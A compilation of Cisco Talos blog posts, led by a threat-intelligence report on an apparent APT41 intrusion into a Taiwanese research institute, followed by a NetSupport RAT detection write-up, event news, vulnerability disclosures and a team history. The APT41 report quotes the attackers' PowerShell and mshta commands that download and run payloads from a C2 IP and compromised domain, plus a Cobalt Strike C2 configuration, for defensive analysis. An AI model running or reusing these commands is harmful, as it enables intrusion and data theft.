ShadowPad, widely considered the successor of PlugX, is a modular remote access trojan (RAT) only seen sold to Chinese hacking groups.

Thursday, August 1, 2024 08:00

*   Cisco Talos discovered a malicious campaign that compromised a Taiwanese government-affiliated research institute that started as early as July 2023, delivering the ShadowPad malware, Cobalt Strike and other customized tools for post-compromise activities.
*   The activity conducted on the victim endpoint matches the hacking group APT41, alleged by the U.S. government to be comprised of Chinese nationals. Talos assesses with medium confidence that the combined usage of malware, open-source tools and projects, procedures and post-compromise activity matches this group’s usual methods of operation.
*   The ShadowPad malware used in the current campaign exploited an outdated vulnerable version of Microsoft Office IME binary as a loader to load the customized second-stage loader for launching the payload.
*   We also discovered that APT41 created a tailored loader to inject a proof-of-concept for CVE-2018-0824 directly into memory, utilizing a remote code execution vulnerability to achieve local privilege escalation.

**Taiwanese Government-Affiliated Research Institute compromised by Chinese Actor**

In August 2023, Cisco Talos detected abnormal PowerShell commands connecting to an IP address to download and execute PowerShell scripts in the environment of a Taiwanese government-affiliated research institute. The victim in this attack was a research institute in Taiwan, affiliated with the government, that specializes in computing and associated technologies. The nature of research and development work carried out by the entity makes it a valuable target for threat actors dedicated to obtaining proprietary and sensitive technologies of interest to them.

**Chinese Threat Actors likely Behind the Attacks**

Cisco Talos assesses with medium confidence that this campaign is carried out by APT41, alleged by the U.S. government to be comprised of Chinese nationals. This assessment is based primarily on overlaps in tactics, techniques and procedures (TTPs), infrastructure and malware families used exclusively by Chinese APT groups. Talos’ analyses of the malware loaders used in this attack reveal that these are ShadowPad loaders. However, Talos has been unable to retrieve the final ShadowPad payloads used by the attackers.

ShadowPad, widely considered the successor of PlugX, is a modular remote access trojan (RAT) only seen sold to Chinese hacking groups. The malware was publicly reported being used by APT41, which is a hacking group believed to be based out of Chengdu, China, according to the U.S. Department of Justice.  Along with APT41 it has also been used by other Chinese hacking groups like Mustang Panda and the Tonto Team.

During the investigation, we observed a couple TTPs or IoC that were observed in previous reported campaigns, including the following:

*   **The same second stage loader binary**: A second stage loader, that acts as a successor to the initial side-loaded ShadowPad loader, discovered by Talos was also linked to ShadowPad  and previously associated with ShadowPad publicly. We have also observed identical loading mechanisms, infection chains and file names being utilized in the current attacks with reliable previous open-source reporting.  
*   **Infrastructure overlapping:** Beside the binary connection, we also found a C2 (103.56.114\[.\]69) that was reported by Symantec. Although the campaign reportedly ran in April 2022, which is more than one year before the campaign we discovered, there were a few similarities between the TTPs observed in the two campaigns. This includes using the same ShadowPad Bitdefender loader, using similar file names for the tool, using Filezilla for moving files between endpoints and using the WebPass tool for dumping credentials. 
*   **The employment of Bitdefender executable for sideloading:** The malicious actor leverages Bitdefender where it uses an eleven year old executable to sideload the DLL-based ShadowPad loader. This technique has been seen in a variety of reports which have been attributed to APT41. This technique has been reported in multiple reports (Reports: 1, 2, 3, 4).

**Chinese Speaking Threat Actor**

This attack saw the use of a unique Cobalt Strike loader, written in GoLang is meant to evade detection of Cobalt Strike by Windows Defender. This loader is based on an anti-AV loader named CS-Avoid-Killing hosted on GitHub and written in Simplified Chinese. The repository is promoted in multiple Chinese hacking forums and technical tutorial articles.

The Cobalt Strike loader also consists of file and directory path strings in Simplified Chinese, indicating that the threat actors that built/compiled the loader were well-versed in the language.

__The Github repository of Cobalt Strike loader.__

__Technical tutorial article on making anti-AV__ __Cobalt Strike backdoor____.__

**Tactic, Technique and Procedure Analysis**

In August 2023, Cisco Talos detected abnormal PowerShell commands connected to an IP address to download PowerShell script for execution in the environment of the target. We performed an investigation based on our telemetry and found the earliest infiltration trace from mid July, 2023. We currently lacked sufficient evidence to conclusively determine the initial attack vector. The threat actor compromised three hosts in the targeted environment and was able to exfiltrate some documents from the network. 

Upon accessing the network, attackers start to gain a foothold by executing malicious code and binaries on the machine. On the machine with the web server, a webshell is installed to enable the threat actor’s ability to perform discovery and execution. The threat actors also dropped malwares including ShadowPad and Cobalt Strike with three different approaches: the installed webshell, RDP access and the reverse shell.

_Webshell drop_

C:/www/un/imjp14k.dll

C:/www/un/service.exe

C:/www/un/imjp14k.dll.dat

_RDP drop_

C:/Users/\[hide\]/Desktop/log.dll

C:/Users/\[hide\]/Desktop/imjp14k.dll

C:/Users/\[hide\]/Desktop/service.exe

C:/Users/\[hide\]/Desktop/imjp14k.dll.dat

C:/Users/\[hide\]/Desktop/log.dll.dat

_Reverse shell drop_

C:/Users/Public/calc.exe

C:/Users/Public/service.exe

C:/Users/Public/imjp14k.dll

C:/Users/Public/imjp14k.dll.dat

C:/Users/Public/log.dll

C:/Users/Public/log.dll.dat

We noticed that a couple of the ShadowPad components were detected and quarantined by our solution when being dropped. The threat actor  later changed their tactic to  bypass the detection.The first attempt was running the following PowerShell commands to launch the PowerShell script for downloading additional scripts (PowerShell and HTA) to run backdoor in memory.

powershell IEX (New-Object System.Net.Webclient).DownloadString('http://103.56.114\[.\]69:8085/p.ps1');test123"

powershell IEX (New-Object System.Net.Webclient).DownloadString('https://www.nss.com\[.\]tw/p.ps1');test123"

mshta https://www.nss.com\[.\]tw/1.hta

powershell -nop -w hidden 

\-encodedcommand “JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFM..."

However, the attempt was again detected and interrupted before the attackers could carry out further actions. Later on, the attackers used another two PowerShell commands to download Cobalt Strike malware from a compromised C2 server (www.nss.com\[.\]tw). The Cobalt Strike malware had been developed using an anti-AV loader to bypass AV detection and avoid the security product quarantine. The following command was used by the threat actor to download anti-AV malware and run the malware in the victim's host machine. A more detailed description about the Cobalt Strike loader can be found in the Malware and Malicious Tools Analysis. 

powershell (new\-object System.Net.WebClient).DownloadFile('https://www.nss.com\[.\]tw/calc.exe','C:/users/public/calc.exe');"

powershell (new\-object System.Net.WebClient).DownloadFile('https://www.nss.com\[.\]tw/calc.exe','C:/users/public/calc2.exe'); "

During the compromise the threat actor attempts to exploit CVE-2018-0824, with a tool called UnmarshalPwn, which we will detail in the sections below. 

The malicious actor is careful, in an attempt to avoid detection, during its activity executes “quser” which, when using RDP allows it to see who else is logged on the system. Hence the actor can stop its activity if any other use is on the system. Cisco Talos also noticed that once the backdoors are deployed the malicious actor will delete the webshell and guest account that allowed the initial access.

**Information gathering and exfiltration**

We observed the threat actor harvesting passwords from the compromised environment. The actor uses Mimikatz to harvest the hashes from the lsass process address space and WebBrowserPassView to get all credentials stored in the web browsers.

From the environment the actor executes several commands including using “net,” “whoami,” “quser,” “ipconfig,” “netstat,” and “dir” commands to obtain information on user accounts, directory structure, and network configurations from the compromised systems. In addition, we also observed query to the registry key to get the current state of software inventory collection on the system with the following command:

C:\\Windows\\system32\\reg.exe query hklm\\software\\microsoft\\windows\\softwareinventorylogging /v collectionstate /reg:64

Beside running commands to discover the network, we also observed the ShadowPad sample perform lightweight network scanning to collect the hosts in the network. The malware tries to discover other machines in the same compromised network environment by connecting to the IPs under the same C class sequentially. The connections were all sent to port “53781”, with unknown reason. 

To exfiltrate a large number of files from multiple compromised machines, we observed threat actors using 7zip to compress and encrypt the files into an archive and later using backdoors to send the archive to the control and command server.

Although there is no new backdoor or hacking tools in this attack, we did find some interesting malware loaders. The threat actor leverages two major backdoors into their infection chains in this campaign, including both shadowPad and Cobalt Strike malware. Those two major backdoors were installed via webshell, reverse shell and RDP by the attacker themselves. In addition, two interesting hacking tools were also found, one is to get local privilege escalation and the other is to get web browser credentials. 

**ShadowPad Loader**

During our investigation of this campaign, we encountered two distinct iterations of ShadowPad. While both iterations utilized the same sideloading technique, they each exploited different vulnerable legitimate binaries to initiate the ShadowPad loader.

The initial variant of the ShadowPad loader had been previously discussed in 2020, and some vendors had referred to it as 'ScatterBee'. Its technical structure and the names of its multiple components have remained consistent with earlier reports.

The more recent variant of the ShadowPad loader targeted an outdated and susceptible version of the Microsoft Office IME imecmnt.exe binary, which is over 13 years old. Upon execution, this loader examines the current module for a specific byte sequence at offset 0xE367. Successful verification of the checksum prompts the loader to seek out and decrypt the "Imjp14k.dll.dat" payload for injection into the system's memory.

The imjp14k loader checksum

Furthermore, we conducted a pivot analysis of this latest loader using VirusTotal and other malware cloud repositories. We identified two different loader types, yet both employed the same legitimate binary to launch the malware.

*   G:\\Bee\\Bee6.2(HD)\\Src\\Dll\_3F\_imjp14k\\Release\\Dll\_3F\_imjp14k.pdb
*   G:\\Bee\\Tree\\Src\\Dll\_3F\_imjp14k\\Release\\Dll.pdb

Second type of imjp14k loader checksum

**Cobalt Strike “Anti-AV loader” from Chinese Open Source Project**

There is a Cobalt Strike loader also detected in this incident. With deep analysis for this loader, we found the loader not only packed with UPX but modified the section name to anti-unpack the malware. There are some interesting observations here suggesting that the adversary may be speaking Chinese. The loader was developed by Go programming language and string in the binary indicates a project name “go版本” which means “go version” in mandarin. Based on the project name we found that the code was cloned from a GitHub source that was written in simplified Chinese and the project is to avoid the Cobalt Strike being deleted by antivirus products.

Embedded project name

Upon analyzing the malware and GitHub page we found, we discovered that the attacker might have followed the GitHub steps to generate this loader and deploy the Cobalt Strike beacon to the victim's environment, the screenshots are shown this loader will get an encrypted picture from C2 server and the code logical same as the one on GitHub. 

Source code from github

Malware from the attack

It’s important to highlight that this cobalt strike beacon shellcode used steganography to hide in a picture and executed by this loader. In other words, its download, decryption, and execution routines all happen in runtime in memory. This Cobalt Strike beacon configuration shown below. 

{"C2Server": "http://45.85.76.18:443/yPc1", "User Agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\\r\\n"}

Unmarshal.exe malware decrypts its payload with four stages. The first stage is the executable file which will try to search \[filename\].tbin, and inject a first stage decryption payload, inject\_loader\_1.dll, in an allocated memory block. The first stage decryption payload will decompress second stage payload, inject\_loader\_2.dll, and injection into memory, the second stage payload will also try to search \*.dlls or ddb.dlls file for next stage payload. If it can not find the specific file, it will decrypt the final payload out and inject that payload into another memory block. After deep analysis, we found the final payload is UnmarshalPwn malware which is a POC for CVE-2018-0824 and uses a remote code execution vulnerability to get local privilege escalation. 

With the artifacts we found in this campaign, we pivoted and discovered some samples and infrastructure that were likely used by the same threat actors but in different campaigns. Although we don’t have further visibility into more details about these campaigns at the moment, we hope that by revealing this information, it would empower the community to connect the dots and leverage these insights for additional investigations.

We found 2 other ShadowPad loaders by pivoting the RICH PE header (978ece20137baea2bcb364b160eb9678) of the ShadowPad loader. Sharing the same RICH PE header indicates that these binaries share a similar compilation environment.

*   2e46fcadacfe9e2a63cfc18d95d5870de8b3414462bf14ba9e7c517678f235c9
*   eba3138d0f3d2385b55b08d8886b1018834d194440691d33d612402ba8a11d28

One of the loaders were observed downloaded from two C2 servers:

*   103.96.131\[.\]84
*   58.64.204\[.\]145

Beside the ShadowPad loader, we found the same Bitdefender loader (386eb7aa33c76ce671d6685f79512597f1fab28ea46c8ec7d89e58340081e2bd) and a payload file on the C2 server. The ShadowPad payload connects to an interesting C2 domain w2.chatgptsfit\[.\]com for communication.

**Coverage**

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.  

ClamAV detections are also available for this threat:

Win.Packed.UnmarshalPwn-10019484-0

Win.Packed.CobaltStrike-10019485-0

Win.Loader.UnmarshalPwn-10019486-0

Win.Loader.Shadowpad-10019487-0 

**IOCs **

IOCs for this research can also be found at our GitHub repository here.

APT41 likely compromised Taiwanese government-affiliated research institute with ShadowPad and Cobalt Strike

In this first Deep Dive with NTDR, we explore how defenders can leverage Snort for the detection of evasive malware threats.

Thursday, August 1, 2024 06:00

_By Chris Morrison._

*   Cisco Talos is actively tracking multiple malware campaigns that utilize NetSupport RAT for persistent infections. 
*   These campaigns evade detection through obfuscation and updates. 
*   Snort can provide a strong defense before this malware reaches endpoints. 
*   In this first Deep Dive with NTDR, we explore how defenders can leverage Snort for the detection of evasive malware threats. 

In November 2023, security vendors identified a new NetSupport RAT campaign that used fake browser updates from compromised and malicious websites to trick users into downloading a stager that downloads and invokes PowerShell commands to install the NetSupport manager agent onto the victim’s machine and establish persistence. 

In January 2024, security researchers published another analysis of the same campaign, although with some differences in the initial JavaScript payload, which demonstrates a threat actor re-focusing on the obfuscation of the initial stager. There are also modifications observed in the agent installation including new paths for the randomized installation. 

So, Cisco Talos followed suit with our own in-depth analysis. We identified multiple obfuscation and evasion techniques being used by the campaign and created appropriate detection to keep users protected. By identifying specific weaknesses in the campaign’s obfuscation techniques and identifying indicators of compromise (IOCs), we can create highly accurate detection of this campaign. Talos is also in a unique position of having primarily open-source detection tools such as Snort and ClamAV. To highlight these capabilities, we will provide a detailed explanation of our detection methodology. 

**Campaign history **

NetSupport Manager has been commercially available for remote device administration since 1989. Like many tools in the IT remote support industry, NetSupport Manager has been weaponized by threat actors who either cannot or do not wish to develop their own RAT. Adversaries first started using NetSuport for malicious purposes in 2017, and at this point, most security vendors widely recognize this software as a RAT. The 2020s' shift to remote work for many office workers marked an increased use of NetSupport RAT in more phishing and drive-by download campaigns, as well as being used alongside other loaders. This campaign is the most notable use of NetSupport RAT in recent years, with hundreds of known stager variants across dozens of domains used in a large-scale malicious advertising campaign. 

**Component summary **

Components in VirusTotal graph. 

1.  Stage 1 is a JavaScript file that is downloaded from one of several malicious advertisements or compromised websites. It’s an obfuscated downloader, keeping a Stage 2 JavaScript and PowerShell payload in memory, which is the actual meat of the dropper. Stage 1 is obfuscated and embedded within otherwise benign JavaScript libraries. 
2.  In Stage 2, a PowerShell script is run via JavaScript. Both are obfuscated, and the PowerShell is embedded in the JavaScript, and the JavaScript is embedded within large comment blocks of random ASCII hex. The PowerShell makes another HTTP GET to retrieve the base64-encoded ZIP. On receipt, the PowerShell extracts the payload into a semi-random path, starts execution, and then establishes basic registry persistence. 
3.  The end payload is a completely portable install of the commercial NetSupport Manager RAT utility. Some of the installs come with additional scripts or slight filename changes to avoid more narrow detection. 

**Stage 1: JavaScript stager **

From 3b587d0c311e8ebc3bb104d564235c41ef8e64592c7419f17f48e0cee9ebc878. 

The screenshot above shows the normalized inner payload for an older version of the JavaScript Stage 1. In this older sample, the actual malicious code is embedded within an otherwise benign JavaScript library. Several libraries are used, including jQuery, moment.js and SheetJS. However, this stage's actual malicious payload is barely obfuscated. The next stage download URL is in plain text. The call to “activeXObject” to create the HTTP connection is in plain text. And similarly, the eval call is in plain text. 

From 01d867d552a06bd778c812810a476441681c4bebabf967e80f8024b3856cb03e 

Here, we have the normalized content of a very recent (first seen 2024.03.09) sample of the stager from the same campaign. Similarly to the older version, the malicious payload is wrapped in an otherwise benign library. Improving over the previous versions, the malicious payload within is further obfuscated with the open-source tool javascript-obfuscator. This results in the removal of the plaintext “activeXObject” and “eval,” however, the output pattern of JavaScript-obfuscator is highly identifiable, as every variable and function name is a random hexadecimal value prefixed by an underscore. 

Deobfuscated 01d867d552a06bd778c812810a476441681c4bebabf967e80f8024b3856cb03e 

The old and new samples shared two major features: All the obfuscation is pre-computed and not done on a per-download basis. This is observable through the fact that so many of the stages can be identified with common entry point functions after having been obfuscated with javascript-obfuscator. Also, the pre-obfuscated stagers are reused by stamping them with a new random download URL. This URL then ends up being in plain text as well so from identifying the highly unique function names from one stager, we can find many more and then automatically extract the download URLs from them statically, which is much faster than throwing them all in analysis sandboxes.  

Fast pattern-only rule for detection. 

**Stage 1 detection **

From a detection standpoint, we can use Snort to leverage a fast\_pattern-only file rule. This simple rule will only detect the given cluster of stagers being downloaded. However, since this is a fast\_pattern-only rule on highly unique text, we can put it in the more general Snort policy configurations since there is little overhead to running this rule. Additionally, the Snort 3 file rule will do all the abstraction from other protocols that can carry files, such as FTP and SMTP, letting us cast our coverage net over a broader attack surface in case this file is being transmitted through more ways than just the known malicious advertisement. 

**Stage 2: JavaScript & PowerShell dropper **

The second stage of the campaign is an in-memory payload downloaded by the on-disk JavaScript. This stage consists of a JavaScript function that then calls PowerShell. 

From 6f3681cd91f7a19c1cf2699e1f9f7b550dfe46841ab5171124e79979fae5424a 

 The JavaScript content is padded on either side by large, repeating, random comment blocks. The actual JavaScript is quite simple, a slightly obfuscated call to ActiveXObject(“WScript.Shell”), which allows the PowerShell command-line to be run. 

Deobfuscated from 6f3681cd91f7a19c1cf2699e1f9f7b550dfe46841ab5171124e79979fae5424a 

The PowerShell invocation is where most of the dropper’s work happens. PowerShell is run with the command line flags “-Ex Bypass” which sets the execution policy to “Bypass”, enabling unsigned execution, “-NoP” which is short for “-NoPolicy” and avoids the current user’s startup script, and “-C” which is short for “-command” and will run the following command line string as a PowerShell script. The commands themselves are a straightforward download of the next stage, which is a base64-encoded ZIP file that contains a portable installation of NetSupport Manager Agent. After downloading the payload, it is base64-decoded, written to disk, and then extracted to the target install folder. A check is run to make sure “client32.exe,” the main executable of the agent, exists in the output directory and then this file is run. Finally, a registry entry is made to establish user-level persistence of the agent on login. 

Interestingly, this stage is not obfuscated with the same techniques as the Stage 1 file. The PowerShell file is only slightly obfuscated through random variable names and string concatenations, and the JavaScript obfuscation uses the same techniques in addition to the mentioned large random comment blocks. Because this obfuscation is so limited, we can rely on static signatures in this case. If future versions of this stager are further obfuscated, using normalized content buffers in Snort such as js\_data can provide a consistent view into the payload. However, this payload has remained largely unchanged besides the payload URLs from November 2023 to March 2024. 

**Stage 2 detection **

For Snort detection, we can use a simple series of content that matches the content of the PowerShell script. The unobfuscated registry key for persistence combined with the PowerShell flags makes a great rule for potential malware dropper detection. We can narrow this even further with the inclusion of the client32.exe filename so that we know we are only alerting on this campaign and similar uses of NetSupport RAT. 

An additional trick would be the use of an HTTP service rule. In Snort 3, the service inspector can identify known services regardless of the port they are on, in contrast to Snort 2 where you will need to define HTTP\_PORTS ahead of time. Regardless of what port the attacker is hosting the HTTP payload on, our rule can detect the malicious content. 

This Snort rule identifies and prevents the current iteration of dropper payloads. A more holistic approach to defense would also include behavioral detection. Since we can observe this dropper’s behavior regardless of any text obfuscation, we will effectively forbid this technique on any protected endpoint and force the threat actor to change tactics. 

Example Sigma detection. 

 The Sigma behavioral rule language can encapsulate this detection quite well. This rule can detect most installs but will fail to identify obfuscations through renames or different registry keys. 

**Obfuscated NetSupport manager download **

Retreading a little bit, the PowerShell invocation downloads a base64-encoded ZIP file of an entire installation of NetSupport Manager agent. For NetSupport Manager and most other legitimate software packages, this is a highly unusual way for the package to be distributed. Most applications are installed via an MSI package or an EXE installer that downloads the full application without obfuscation. The client binaries are not obfuscated by the threat actor since obfuscating an existing compiled binary is more challenging than obfuscating the source code scripts identified in stage 1 and stage 2 files. Because of this, the unique DLLs that encompass most of the NetSupport Manager Client’s actual logic are not renamed. 

It might seem we will have to stream decode the base64 content and unzip it in memory to scan for malicious file contents; we can exploit two specific features of the ZIP in base64 format. The highly unique DLL names will all be close together in the ZIP archive central directory, the structure that holds the information on what files are in the archive. Second, base64 is not a random encoding, and we can pre-compute all three possible base64-encoded strings that represent any one given input. CyberChef has an excellent demonstration of how this works. This method involves the possible two-bit alignment positions within the six-bit encoding size of a given base64 character. Putting all this together means that we can pre-compute all the combinations of the base64-encoded DLL names as high-speed rules that are only looking for static content matches.  

The threat actors using NetSupport RAT in this campaign are typically looking for the fastest way to get a RAT agent into deployment. The threat actors who use NetSupport Manager are not putting a strong amount of effort into obfuscation of droppers, let alone the agents, so this is an effective rule for their non-standard download paths.  

**Additional Snort detections **

Talos has existing Snort coverage for NetSupport Manager Agent’s network activity leveraging SID 44678, which was created back in 2017. We also expanded this coverage in 2020, with the creation of SIDs 53539 - 53544 as the usage by malicious actors increased. For the latest campaign, we increased our coverage through a Snort feature that was not available before. File Rules are a feature only available in Snort 3 that allows the abstraction of file contents from the protocols that carry them, allowing us to write wider-reaching signatures. 

As the NetSupport RAT files are not typically obfuscated by threat actors and it is a legitimate commercial product with many specialized features, there are many opportunities to create detection against the files. For example, in both the EXE and DLLs, the full manufacturer and product information for NetSupport Manager Client is detailed. 

As other legitimate software binaries are unlikely to include the full metadata for NetSupport Manager, this gives us a great signature to work with that lets us cleanly identify the binaries without any heavy reverse engineering needed. Although Snort does not have a modifier for Unicode strings, Unicode text byte strings can be leveraged for detection. Once again, we can use the “file” rule target to throw our detection net over a much larger surface than just HTTP downloads. Other campaigns using NetSupport Manager RAT will be observable from this rule through Snort’s ability to inspect file streams from multiple protocols. 

Although NetSupport RAT continues to be used by malicious campaigns, its widespread use hinders those threat actors who are not willing to dedicate the resources to develop their own tools or more evasive techniques. And since this campaign is still active and updated, we may still observe these techniques being developed and deployed by this threat actor. For now, this gives us an example of when a threat is persistent but not advanced. 

**Indicators of Compromise **

Indicators of Compromise associated with this threat can be found here.

Detecting evolving threats: NetSupport RAT campaign

This year marks the 10th anniversary of Cisco Talos, as the Talos brand was officially launched in August 2014 at Black Hat.

Thursday, August 1, 2024 05:00

With Black Hat just a week away, Cisco Talos is gearing up for another year of heading to Las Vegas to share in some of the latest major cybersecurity announcements, research and news.  

This year marks the 10th anniversary of Cisco Talos, as the Talos brand was officially launched in August 2014 at Black Hat.

We’re celebrating 10 years of pissing off the bad guys by highlighting Talos moments from the archives and recognizing the folks that make Talos, Talos. Be sure to swing by the Cisco booth in the business hall to celebrate 10 years with us!

We know the week of Black Hat is a busy one, so we’ve pulled together our highlights, so you don’t miss anything:  

**Wednesday, Aug. 7  **

**On the show floor:** Talos will have a demo within the Cisco booth where members of Talos will be available all day long. Talos folks will also be presenting in-booth talks every half hour on their latest research and findings. You can also catch a Talos overview in the Splunk booth. 

**Lunch & Learn:** Engage with Cisco Talos Incident Response over "Backdoors & Breaches." Join Joe Marshall and other Talosian game masters from 12:05 to 1:30 p.m. local time in Lagoon KL, Level 2 as they walk attendees through incident response tabletop exercises and learn attack tactics, tools and methods.  

**Sponsored Session:** Nick Biasini will be giving a Cisco Talos threat briefing on identity attacks, zero-days, ransomware and infostealers. Join the session in Mandalay Bay I from 3 - 3:50 p.m. local time.   

**Thursday, Aug. 8 **

**On the show floor:** Talos will have a demo within the Cisco booth where members of Talos will be available all day long. Talos folks will also be presenting in-booth talks every half hour on their latest research and findings. In the Splunk booth, Brad Garnett will cover how Talos IR integrates with Splunk.

Where to find Talos at BlackHat 2024

A binary in Apple macOS could allow an adversary to execute an arbitrary binary that bypasses SIP.

Wednesday, July 31, 2024 12:00

Cisco Talos’ Vulnerability Research team has helped to disclose and patch six new vulnerabilities over the past three weeks, including one in a driver that powers certain NVIDIA graphics cards.  

The majority of the vulnerabilities that Talos disclosed during this period exist in Ankitects Anki, an open-source program that allows users to study information using flashcards. The most serious of these issues has a CVSS score of 9.6 out of 10. 

All the vulnerabilities mentioned in this blog post have been patched by their respective vendors, all in adherence to Cisco’s third-party vulnerability disclosure policy. 

For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website. 

**Out-of-bounds read vulnerability in NVIDIA GPU Compiler Driver **

_Discovered by Piotr Bania._ 

A compiler driver in some NVIDIA graphics cards contains an out-of-bounds read vulnerability that could allow an adversary to read an arbitrary memory region. 

An adversary could exploit TALOS-2024-1956 (CVE-2024-0107) by sending a targeted device a specially crafted executable/shader file, leading to an out-of-bounds read. 

This vulnerability could be triggered from guest machines running virtualization environments to perform a guest-to-host escape — as previously demonstrated in other GPU vulnerabilities like TALOS-2018-0533. 

Talos researchers were able to trigger this vulnerability from a Hyper-V guest using the RemoteFX feature, which led to being able to execute the vulnerable code on the Hyper-V host. While Microsoft has deprecated RemoteFX, this feature may still be present in older versions of the Windows operating system. 

**Multiple vulnerabilities in Ankitects Anki flashcard software **

_Discovered by Autumn Bee Skerritt of Cisco Duo Security and Jacob B._ 

The Ankitects Anki flashcard software contains multiple vulnerabilities, one of which could lead to arbitrary code execution. This open-source tool allows users to create and share flashcards to study information.  

An adversary could exploit all these vulnerabilities by sharing a specially crafted, malicious flashcard with a targeted user.  

TALOS-2024-1994 (CVE-2024-32152) could lead to the creation of an arbitrary file along a fixed path. This vulnerability exists because a malicious user could manipulate a blocklist that normally prevents the use of certain malicious commands.  

TALOS-2024-1992 (CVE-2024-29073) also involves manipulating the command blocklist, but in this case, could lead to arbitrary file read. 

An adversary could also exploit TALOS-2024-1995 (CVE-2024-32484), a cross-site scripting vulnerability, in the software to inject JavaScript code into a flashcard and read a normally inaccessible file.  

The most serious among this group of vulnerabilities is TALOS-2024-1993 (CVE-2024-26020), a script injection vulnerability that could lead to arbitrary code execution. This vulnerability has a CVSS score of 9.6 out of 10. In Talos’ testing, researchers could exploit this vulnerability to obtain full command injection on the targeted user’s system.

Out-of-bounds read vulnerability in NVIDIA driver; Open-source flashcard software contains multiple security issues

We look back on 10 years of Talos, in multiple interviews with Talos' leaders.

Wednesday, July 31, 2024 07:55

As part of the celebrations of Cisco Talos turning 10, we’d like to take you back to where it all began: How we formed our mission of protecting our customers and making the internet suck a bit less, an insight into our culture, and how we came to work with some of the most talented human beings on the planet.  

This is the history of Talos, as told through the eyes of some of our senior leaders. 

**The Sourcefire years**

_Editor's note: Sourcefire was a company that specialized in Firepower network security appliances based on Snort, an open-source intrusion detection system. Sourcefire was acquired by Cisco for $2.7 billion in July 2013._

**Matt Watchinski, Vice President of Talos:** What I remember most from the early years of Sourcefire was all of us being crowded into a minuscule meeting room. We spent our days discussing huge, complicated s\*\*t. There was so much mutual respect and understanding for what we set out to achieve. 

**Chris Marshall, Director of Talos Network Detection and Response Team:** We all collectively believed that we could be the best security team on the planet. We were so passionately driven to achieve things together. And we went out of our way to take care of each other to make sure those two other things happened. 

**Watchinksi:** We had a group that could change priorities on a dime, and then actually execute on them — without anybody coming back and saying, “The dumbest decision in the entire world was just made in that tiny room. Now we have to go and do stupid s\*\*t.” Everybody came back from that room and said, “Alright, this is the thing that's going to make Sourcefire the most successful, and so that’s the direction we’re going to march in.” 

**Lurene Grenier, Director of Competitive Analysis:** At Sourcefire our goal was to build the best and most open product we could. At the time, all the rules had to be written by hand, without any guidance. We had no contracts with any companies. The biggest thing on the map at that point was Patch Tuesday bugs, and they were all remote root bugs. Every month, 15 - 20 of those bugs would get dropped. It was my job to grab the patches, patch the systems, reverse engineer the patches, and write an exploit for the bug. And then I would pass that exploit to the team who wrote the \[Snort\] rules. We would write the documentation, package everything up, and send that to QA. 

We significantly changed the security posture and behaviour of Fortune 50 companies on the regular, with about 30 people. We were doing things that the industry said was impossible. And my favorite part was we had executives from those Fortune 50 companies coming out to buy us lunch, begging us to stop telling the public the truth. 

**The acquisition of Sourcefire**

**Marshall:** I came to Sourcefire from the U.S. military. I had no idea what being acquired meant.  

**Watchinski:** We had been in negotiations with Cisco for about six months. I couldn’t tell anyone about that though. Those final negotiations went on until 4 a.m. the morning that the deal closed. We didn’t stop until we had reached a deal that was right for our people. At 4:30 a.m., I sent a text to my directs, telling them that something big was happening, and they should come into the office at 7 a.m.  

**Marshall:** At the time, I ran the response work. And Watchinski didn't tell me if there was a problem. So, my instincts told me something was very wrong. “Who else do I need to call? How bad is the situation?” And he just replied, “I just need you there first thing in the morning.” So, the next morning Watchinski walked in, and me, \[Matt\] Olney \[Director of Threat Intelligence and Interdiction\] and Nigel \[Houghton, former director of Talos Operations\] are standing around anxiously. And then Watchinski said, “Cisco just bought us. We're not working today.”   

**Three teams coming together**

 **Watchinski:** For the first year after the acquisition, Sourcefire continued as the VRT (Vulnerability Research Team). During that time, we met various people across Cisco and tried to figure out what they all did. One of the people I met was Luci \[Lagrimas\]. She’s an incredible person, and we started hatching a plan on how we could be successful together. 

We proposed bringing together a singular set of services, a singular threat research and intelligence team, a singular understanding of our data, and a singular voice of how we talk about security. 

I gave a presentation to what was then three different groups — VRT, Cisco Threat Research, Analysis and Communications (TRAC), and Security Applications (SecApps).  

**Luci Lagrimas, Senior Director of Engineering:** That was a day I’ll always remember. We all gave presentations about who we were and who our teams were. I put three pictures on an “About Me” slide, and one of them was me playing field hockey, wearing a T-shirt that definitely showed off my guns. \[Matt\] Olney leans over to Marshall and says, “Dude, she can kick our ass!”  

**Matt Olney, Director of Talos Threat Intelligence & Interdiction**: This remains true to this day. 

__Luci’s photo from her original slide deck at the first Talos meeting.__

**Marshall:** My first impression of Luci was that slide. That set the tone for these teams coming together, because here’s this badass lady with a field hockey stick causing carnage on the field, and that’s what we were going to bring into our group.  

**The Talos brand is born**

**Lee Jones, Talos distinguished engineer:** My first exposure to Matt \[Watchinski\] was a cultural definition point, because Matt came in and did what he’s great at, which is coalesce things. It was incredible to watch how he started forming the vision of what Talos was going to be. 

**Watchinski:** I believe that to have an effective team, you need three things: a mission that everybody understands, a culture that everybody can work in, and some type of icon that people can rally behind. A colleague of mine would always say, “This is how you build a cult!” And I would reply, “Yeah, kinda...but the good kind of cult.” 

I knew that having three different brands and messages wouldn’t work. We needed the branding to reflect on who we were as a new team coming together. That was a point of unity — giving up what the VRT had built from a brand perspective for over 10 years. And asking the others to do the same. 

